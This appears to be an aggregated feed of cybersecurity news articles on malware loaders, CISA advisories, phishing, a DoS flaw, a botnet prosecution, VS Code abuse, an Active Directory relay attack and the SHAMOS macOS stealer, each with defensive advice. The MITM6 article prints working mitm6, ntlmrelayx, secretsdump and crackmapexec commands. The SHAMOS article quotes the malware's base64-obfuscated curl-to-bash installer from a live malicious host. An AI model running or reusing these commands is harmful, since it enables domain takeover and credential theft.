-
Cybersecurity researchers have disclosed details of a new malware loader called QuirkyLoader that’s being used to deliver via email spam campaigns an array of next-stage payloads ranging from information stealers to remote access trojans since November 2024. Some of the notable malware families distributed using QuirkyLoader include Agent Tesla, AsyncRAT, Formbook, Masslogger, Remcos RAT,
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
As security professionals, it’s easy to get caught up in a race to counter the latest advanced adversary techniques. Yet the most impactful attacks often aren’t from cutting-edge exploits, but from cracked credentials and compromised accounts. Despite widespread awareness of this threat vector, Picus Security’s Blue Report 2025 shows that organizations continue to struggle with preventing
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Cybersecurity researchers are highlighting a dangerous attack technique that combines rogue IPv6 configuration with NTLM credential relay to achieve complete Active Directory domain compromise, exploiting default Windows configurations that most organizations leave unchanged. Attack Leverages Default Windows IPv6 Behavior The MITM6 + NTLM Relay attack exploits Windows systems’ automatic DHCPv6 requests, even in networks that […]
The post MITM6 + NTLM Relay Attack Enables Full Domain Compromise appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
CISA issued four comprehensive Industrial Control Systems (ICS) advisories on August 19, 2025, highlighting serious vulnerabilities affecting critical infrastructure sectors including energy and manufacturing.
These advisories detail exploitable vulnerabilities with CVSS scores ranging from 5.8 to 9.8, requiring immediate attention from system administrators and security professionals.
Key Takeaways
1. CISA issued four ICS advisories for Siemens, Tigo Energy, and EG4 systems affecting critical infrastructure.
2. Critical vulnerabilities (CVSS up to 9.8) enable remote attacks and system compromise.
3. Update immediately - Apply vendor patches and implement network segmentation.Critical Siemens Vulnerabilities
Two significant Siemens advisories were released addressing distinct attack vectors. Advisory ICSA-25-231-01 covers the Desigo CC Product Family and SENTRON Powermanager, identifying a least privilege violation (CWE-272) vulnerability tracked as CVE-2025-47809 with a CVSS v3.1 score of 8.2.
This vulnerability affects Wibu CodeMeter components across multiple product versions (V5.0 through V8), enabling privilege escalation through the CodeMeter Control Center component immediately after installation.
The second Siemens advisory, ICSA-25-231-02, addresses the Mendix SAML Module with a more severe improper verification of cryptographic signature (CWE-347) vulnerability.
CVE-2025-40758 carries a CVSS v3.1 score of 8.7 and enables unauthenticated remote attackers to hijack accounts in specific Single Sign-On (SSO) configurations.
The vulnerability affects multiple Mendix versions, with patches available requiring updates to V3.6.21, V4.0.3, or V4.1.2 depending on the deployment.
Tigo and EG4 Infrastructure Vulnerabilities
The energy sector faces particularly severe threats with two advisories targeting solar energy infrastructure.
ICSA-25-217-02 addresses Tigo Energy’s Cloud Connect Advanced devices with three critical vulnerabilities: hard-coded credentials (CWE-798), command injection (CWE-77), and predictable PRNG seeds (CWE-337).
CVE-2025-7768 received the highest CVSS v4 score of 9.3, while CVE-2025-7769 and CVE-2025-7770 both scored 8.7.
EG4 Electronics inverters, covered in advisory ICSA-25-219-07, present four distinct vulnerabilities including cleartext transmission (CWE-319), firmware integrity issues (CWE-494), observable discrepancies (CWE-203), and authentication bypass (CWE-307).
The most critical, CVE-2025-46414, achieved a CVSS v4 score of 9.2, though EG4 deployed server-side fixes for some vulnerabilities in April 2025.
Mitigations
Siemens requires CodeMeter updates to version 8.30a and enables UseEncryption configurations for SAML modules.
Tigo Energy is developing comprehensive fixes, while EG4 has implemented server-side patches and plans new hardware releases by October 15, 2025.
CISA emphasizes implementing defense-in-depth strategies, including network segmentation, VPN-secured remote access, and firewall isolation.
Organizations should prioritize impact analysis and risk assessment before deploying defensive measures, while monitoring for suspicious activity and reporting incidents to CISA for correlation analysis.
No public exploitation has been reported for these specific vulnerabilities, providing a critical window for remediation efforts.
Safely detonate suspicious files to uncover threats, enrich your investigations, and cut incident response time. Start with an ANYRUN sandbox trial →The post CISA Releases Four ICS Advisories Surrounding Vulnerabilities, and Exploits appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Researchers at Push Security have discovered a new phishing campaign that targets Microsoft 365 (M365) systems and uses Active Directory Federation Services (ADFS) to enable credential theft. This attack vector exploits Microsoft’s authentication redirect mechanisms, effectively turning a legitimate service into a conduit for phishing operations. Sophisticated Phishing Infrastructure The campaign begins with malvertising lures […]
The post New Campaign Uses Active Directory Federation Services to Steal M365 Credentials appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Security researchers at Imperva have disclosed a critical pre-handshake memory exhaustion vulnerability in the widely-used LSQUIC QUIC implementation that enables remote attackers to crash servers through denial-of-service attacks. The flaw, designated CVE-2025-54939 and dubbed “QUIC-LEAK,” bypasses standard QUIC connection-level protections by triggering before any handshake is established, leaving servers vulnerable to unbounded memory growth and […]
The post QUIC-LEAK Vulnerability Allows Attackers to Drain Server Memory and Cause DoS appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A sophisticated attack chain that combines MITM6 with NTLM relay techniques to achieve full Active Directory domain compromise.
The attack exploits Windows’ default IPv6 auto-configuration behavior, allowing attackers to escalate from network access to Domain Admin privileges in minutes.
Key Takeaways
1. Abuses Windows IPv6 auto-config and AD's 10-machine account quota for domain compromise.
2. Uses mitm6 + ntlmrelayx to create malicious accounts with RBCD to reach Domain Admin quickly.
3. Fix: Disable IPv6, set ms-DS-MachineAccountQuota = 0, enable signing, deploy DHCPv6 Guard.This technique poses significant risks to organizations running standard Windows environments, as it leverages built-in protocols rather than requiring malware or zero-day exploits.
IPv6 Auto-Configuration Attack
Resecurity reports that the MITM6 attack targets a fundamental Windows behavior: automatic DHCPv6 requests sent when systems boot or connect to networks.
Even in organizations not actively using IPv6, Windows machines prioritize IPv6 configuration over IPv4, creating an exploitable attack surface.
Attackers deploy the mitm6 tool to act as a rogue DHCPv6 server, responding to these requests and assigning malicious DNS server addresses to victim machines.
The command sudo mitm6 -d target.local –no-ra establishes the attacker as the authoritative DNS server for the target domain.
Attack chain The attack chain continues with ntlmrelayx from the Impacket toolkit, which intercepts NTLM authentication attempts through WPAD (Web Proxy Auto-Discovery Protocol) spoofing.
The tool executes: sudo impacket-ntlmrelayx -ts -6 -t ldaps://target.local -wh fakewpad –add-computer –delegate-access, creating malicious computer accounts and configuring Resource-Based Constrained Delegation (RBCD).
Active Directory’s default ms-DS-MachineAccountQuota setting allows any authenticated user to add up to 10 machine accounts, enabling attackers to create controlled computer objects, reads the report.
These accounts can then modify their msDS-AllowedToActOnBehalfOfOtherIdentity attribute, allowing impersonation of privileged accounts, including Domain Administrators.
Recommendations
The attack’s impact extends far beyond initial network compromise. Once successful, attackers can extract NTLM hashes using secretsdump.py “target.local/User:Password@target.local” and conduct lateral movement with tools like CrackMapExec: crackmapexec smb 10.0.0.1/8 -u administrator -H 1f937b21e2e0ada0d3d3f7cf58c8aade –share.
Take Control of Compromised Machines Organizations face severe consequences, including full domain compromise, credential theft, service disruption, and potential data exfiltration.
The attack’s stealthy nature makes detection challenging, as it abuses legitimate Windows protocols.
Critical mitigation strategies include disabling IPv6 when not required, setting ms-DS-MachineAccountQuota = 0 to prevent unauthorized computer account creation, and enforcing SMB and LDAP signing to prevent relay attacks.
Network-level defenses should implement DHCPv6 Guard on switches and routers to block unauthorized IPv6 advertisements.
This attack demonstrates how default configurations can create significant security vulnerabilities, emphasizing the need for proactive hardening of Active Directory environments and continuous monitoring for rogue network services.
Safely detonate suspicious files to uncover threats, enrich your investigations, and cut incident response time. Start with an ANYRUN sandbox trial →The post New MITM6 + NTLM Relay Attack Let Attackers Escalate Privileges and Compromise Entire Domain appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A sophisticated malware campaign targeting macOS users has emerged between June and August 2025, successfully attempting to compromise over 300 customer environments through deceptive help websites.
The malicious operation deploys SHAMOS, a variant of the notorious Atomic macOS Stealer (AMOS), developed by the cybercriminal group COOKIE SPIDER who operates this information stealer as malware-as-a-service for rent to other cybercriminals.
The attack begins when unsuspecting users search for common macOS troubleshooting solutions, such as “macos flush resolver cache,” only to encounter promoted malvertising websites in their search results.
These fraudulent sites, including mac-safer.com and rescue-mac.com, masquerade as legitimate technical support resources while harboring malicious intent.
The campaign has targeted users across multiple countries including the United States, United Kingdom, Japan, China, Colombia, Canada, Mexico, and Italy, notably excluding Russia due to restrictions within Russian eCrime forums that prohibit targeting Commonwealth of Independent States regions.
CrowdStrike researchers identified that the threat actors exploit a sophisticated social engineering approach by presenting victims with seemingly helpful instructions for resolving their technical issues.
However, these instructions contain a critical deception: victims are instructed to execute a malicious one-line terminal command that initiates the malware installation process.
.webp)
Search engine results with promoted malvertising website (Source – CrowdStrike) The researchers noted that one Google Advertising profile promoting these spoofed websites appears to impersonate a legitimate Australia-based electronics store, suggesting advanced identity spoofing techniques.
.webp)
Google advertising profile (Source – CrowdStrike) Infection Mechanism and Technical Implementation
The malware’s infection mechanism relies on a cleverly disguised terminal command that victims unknowingly execute:-
"curl -fsSL" $ ("echo" "aHR0cHM6Ly9pY2xvdWRzZXJ2ZXJzLmNvbS9nbS9pbnN0YWxsLnNo" | "base64 -d") | "bash"This command performs several critical operations in sequence. First, it decodes the Base64-encoded string to reveal the URL https://icloudservers.com/gm/install[.]sh, then downloads and executes a Bash script from this malicious server.
The script captures the user’s password and subsequently downloads the SHAMOS Mach-O executable from https://icloudservers.com/gm/update.
Once installed in the /tmp/ directory, SHAMOS employs multiple evasion techniques to avoid detection.
The malware removes extended file attributes using xattr commands to bypass macOS Gatekeeper security checks, assigns executable permissions through chmod, and conducts anti-virtual machine checks to ensure it is not operating within a security sandbox environment.
The stealer then executes various AppleScript commands for comprehensive host reconnaissance and data collection.
SHAMOS specifically targets cryptocurrency wallet files, sensitive credential databases, Keychain data, AppleNotes content, and browser-stored information.
The malware packages stolen data into a ZIP archive named “out.zip” and exfiltrates it using curl commands to remote servers.
Additionally, SHAMOS establishes persistence through a Plist file named com[.]finder[.]helper[.]plist saved to the User’s LaunchDaemons directory when sudo privileges are available.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.The post New SHAMOS Malware Attacking macOS Via Fake Help Websites to Steal Login Credentials appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
Federal authorities have charged a 22-year-old Oregon man with operating one of the most powerful distributed denial-of-service (DDoS) botnets ever discovered, marking a significant victory in the ongoing battle against cybercriminal infrastructure. Ethan Foltz of Eugene, Oregon, faces federal charges for allegedly developing and administering the “Rapper Bot” DDoS-for-hire service, which has been conducting large-scale […]
The post 22-year-old Operator of ‘Rapper Bot’ Botnet Charged for Launching 3 Tbps DDoS Attack appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
-
A critical security vulnerability has been discovered in Microsoft’s VS Code Remote-SSH extension that allows attackers to execute malicious code on developers’ local machines through compromised remote servers.
Security researchers have demonstrated how this attack, dubbed “Vibe Hacking,” exploits the inherent trust relationship between remote development environments and local machines, affecting both VS Code and popular forks like Cursor.
The vulnerability stems from a dangerous misconception among developers who believe remote development environments provide complete isolation.
Key Takeaways
1. VS Code Remote-SSH extension allows attackers to execute malicious code on developers' local machines.
2. Attackers use built-in commands to open local terminals and automatically run arbitrary code.
3. Exposing their workstations to compromise when connecting to untrusted servers.However, once a server is compromised, attackers can easily pivot to the developer’s local machine through the Remote-SSH extension’s built-in functionality.
Exploiting Built-in Commands
Calif reports that the attack leverages two specific VS Code commands that operate within the default configuration settings.
Malicious extensions on compromised servers can execute the workbench.action.terminal.newLocal command to open a terminal directly on the developer’s local machine, bypassing the remote environment entirely.
Attack Chain Once the local terminal is established, attackers deploy the workbench.action.terminal.sendSequence command to send arbitrary text sequences to the terminal.
By appending a newline character, the malicious code executes automatically as if the developer pressed Enter. This technique effectively transforms the trusted development environment into a command and control channel, reads the report.
The attack works seamlessly because the Remote-SSH extension inherently trusts communications from the remote server.
When developers connect to what they believe is an isolated sandbox environment, they unknowingly expose their local machines to potential compromise.
Mitigation Strategies
Microsoft has acknowledged these risks on the Remote-SSH extension marketplace page, warning that “a compromised remote could use the VS Code Remote connection to execute code on your local machine”.
However, this warning has not prevented widespread adoption of remote development practices, particularly for AI agent deployment and testing.
Security researchers suggest implementing user approval mechanisms when remote extensions attempt to open local terminals or send keystrokes to active terminals.
Monitoring the ~/.cursor-server directory for unauthorized changes can provide limited protection, though this approach offers minimal security if servers are fully compromised.
The vulnerability highlights the need for secure-by-default designs in development tools that don’t rely on users making complex trust decisions.
As remote development continues growing in popularity, addressing these fundamental security issues becomes increasingly critical for protecting developer workstations from sophisticated supply chain attacks.
Safely detonate suspicious files to uncover threats, enrich your investigations, and cut incident response time. Start with an ANYRUN sandbox trial →The post Microsoft VS Code Remote-SSH Extension Hacked to Execute Malicious Code on Developer’s Machine appeared first on Cyber Security News.
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
¶¶¶¶¶
